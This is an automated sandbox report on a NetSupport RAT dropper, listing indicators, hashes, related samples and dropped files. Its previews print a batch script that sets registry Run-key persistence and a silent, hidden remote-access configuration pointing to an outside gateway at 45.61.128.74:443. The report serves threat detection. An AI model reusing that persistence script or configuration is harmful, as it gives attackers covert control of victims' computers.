                                                  http://127.0.0.1RESUMEPRINTINGfile.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                    		high
                                                    http://%s/testpage.htmbild.exe, bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                      		high
                                                      http://geo.netsupportsoftware.com/location/loca.aspPbild.exe, 00000004.00000002.3581039024.0000000000F91000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.netsupportschool.com/tutor-assistant.asp11(file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                          		high
                                                          http://127.0.0.1bild.exe, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                            		high
                                                            http://www.symauth.com/cps0(file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                              		high
                                                              http://www.netsupportschool.com/tutor-assistant.aspfile.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                                		high
                                                                http://%s/fakeurl.htmbild.exe, bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  45.61.128.74
                                                                  		unknownUnited States
                                                                  		9009M247GBtrue
                                                                  104.26.0.231
                                                                  		geo.netsupportsoftware.comUnited States
                                                                  		13335CLOUDFLARENETUSfalse

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1556890
                                                                  Start date and time:2024-11-16 12:52:13 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 43s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
                                                                  Number of analysed new started processes analysed:11
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:file.exe
                                                                  Detection:MAL
                                                                  Classification:mal88.rans.evad.winEXE@11/13@1/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 79%
                                                                  • Number of executed functions: 186
                                                                  • Number of non-executed functions: 187
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  11:53:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Public\Videos\Video\bild.exe
                                                                  11:53:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Public\Videos\Video\bild.exe

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  104.26.0.231KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  qvoLvRpRbr.msiGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  EMX97rT0GX.msiGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  Support_auto.msiGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  geo.netsupportsoftware.comKC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • 104.26.0.231
                                                                  KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • 104.26.0.231
                                                                  72BF1aHUKl.msiGet hashmaliciousNetSupport RATBrowse
                                                                  • 172.67.68.212
                                                                  hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.0.231
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.1.231
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.1.231
                                                                  CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • 172.67.68.212
                                                                  CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • 172.67.68.212
                                                                  CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • 172.67.68.212

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  M247GByhYrGCKq9s.exeGet hashmaliciousRedLineBrowse
                                                                  • 91.202.233.18
                                                                  meerkat.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 38.201.237.116
                                                                  botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 38.207.55.160
                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                  • 213.182.204.57
                                                                  arm7.elfGet hashmaliciousUnknownBrowse
                                                                  • 213.182.204.57
                                                                  bin.sh.elfGet hashmaliciousMiraiBrowse
                                                                  • 45.88.100.118
                                                                  sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                  • 38.206.146.185
                                                                  botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 173.211.86.154
                                                                  qy8i3kM2Ir.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                  • 172.111.244.104
                                                                  CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                  • 172.67.174.133
                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                  • 172.67.174.133
                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.80.55
                                                                  rSWIFT.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 188.114.96.3
                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                  • 172.67.174.133
                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                  • 172.64.41.3
                                                                  https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/safetyworksolutions.com%2Fkese%2F7980321465/eW9vbmp1LmNob0Bib2xsb3JlLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                  • 104.18.11.207
                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                  • 172.67.174.133
                                                                  TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 172.67.208.107

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\Public\Public\Videos\Video\HTCTL32.DLLKC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                    KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                        file.exeGet hashmaliciousNetSupport RATBrowse
                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                            CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                              CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                  Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\Public\Public\Videos\Video\HTCTL32.DLL

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):328056
                                                                                    Entropy (8bit):6.754723001562745
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                    MD5:2D3B207C8A48148296156E5725426C7F
                                                                                    SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                    SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                    SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                    Malicious:false
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                    Joe Sandbox View:
                                                                                    • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                    • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                    • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                    • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\Public\Public\Videos\Video\NSM.LIC

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):257
                                                                                    Entropy (8bit):5.119720931145611
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                    MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                    SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                    SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                    SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..

                                                                                    C:\Users\Public\Public\Videos\Video\PCICHEK.DLL

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):18808
                                                                                    Entropy (8bit):6.22028391196942
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                    MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                    SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                    SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                    SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                    Malicious:false
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\PCICHEK.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\Public\Public\Videos\Video\PCICL32.DLL

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3735416
                                                                                    Entropy (8bit):6.525042992590476
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                    MD5:00587238D16012152C2E951A087F2CC9
                                                                                    SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                    SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                    SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                    • Antivirus: Virustotal, Detection: 17%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................

                                                                                    C:\Users\Public\Public\Videos\Video\TCCTL32.DLL

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):396664
                                                                                    Entropy (8bit):6.809064783360712
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                    MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                    SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                    SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                    SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\TCCTL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    • Antivirus: Virustotal, Detection: 3%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\Public\Public\Videos\Video\bild.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):105848
                                                                                    Entropy (8bit):4.68250265552195
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                    MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                    SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                    SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\bild.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                    • Antivirus: Virustotal, Detection: 49%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\Public\Public\Videos\Video\client32.ini

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):700
                                                                                    Entropy (8bit):5.533099732210104
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Wrqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuZIAlkz6:mqzEmPZly6YBlLoG1fXXfDioIAaz6
                                                                                    MD5:5778ABD7CF2E8039239CD5982281D61A
                                                                                    SHA1:9AA6E80A115343A100031C9473FC6A071EEFD07E
                                                                                    SHA-256:0BD4DC8B66C588F715B117021EF14C959E396F5CC6041F885F0D121401BC267A
                                                                                    SHA-512:DC01567D881D48554732747A286AC9A95EF095B4CB860F384B85636B160778C9EFE366F53550B74D9DDF504B293F03BBB252E5247F03490E4567AD142DEF6E0A
                                                                                    Malicious:false
                                                                                    Preview:0x289612fe....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=45.61.128.74:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....

                                                                                    C:\Users\Public\Public\Videos\Video\msvcr100.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):773968
                                                                                    Entropy (8bit):6.901559811406837
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                    MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                    SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                    SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                    SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\Public\Public\Videos\Video\netsup.bat

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):311
                                                                                    Entropy (8bit):5.308980069606459
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:hwszH1j0KpIAgidquHLNQ+bsWWNQ+bd83OG52LvVJ:HVj0Kprgidqunr2SP2hJ
                                                                                    MD5:4DB329A7BA03593C3D02C5E80068F82A
                                                                                    SHA1:70B77611F440DAC81778F54A316E811F3B3C63A4
                                                                                    SHA-256:7182655A9F8489E5B761C16192F3DE1662114F7AA9938F87E0062F8859DAE7F5
                                                                                    SHA-512:6B34FC8000A457F44BEFB03A8153D7E77CA0B8F44705AB7DF2FED3F52599A9172E9A866938986A36B4376C99260B5D03B5496DD605DBFBBD7BF301FE72D31F83
                                                                                    Malicious:true
                                                                                    Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Public\Videos\Video\bild.exe"..start %Public%\Public\Videos\Video\bild.exe..[HKEY_CURRENT_USER\Software\Supservice.."Supservice"="C:\\Program Files (x86)\\Supservice\\supservice.exe".."Version"="5"]..

                                                                                    C:\Users\Public\Public\Videos\Video\nskbfltr.inf

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:Windows setup INFormation
                                                                                    Category:dropped
                                                                                    Size (bytes):328
                                                                                    Entropy (8bit):4.93007757242403
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                    MD5:26E28C01461F7E65C402BDF09923D435
                                                                                    SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                    SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                    SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                    Malicious:false
                                                                                    Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                    C:\Users\Public\Public\Videos\Video\pcicapi.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33144
                                                                                    Entropy (8bit):6.737780491933496
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                    MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                    SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                    SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
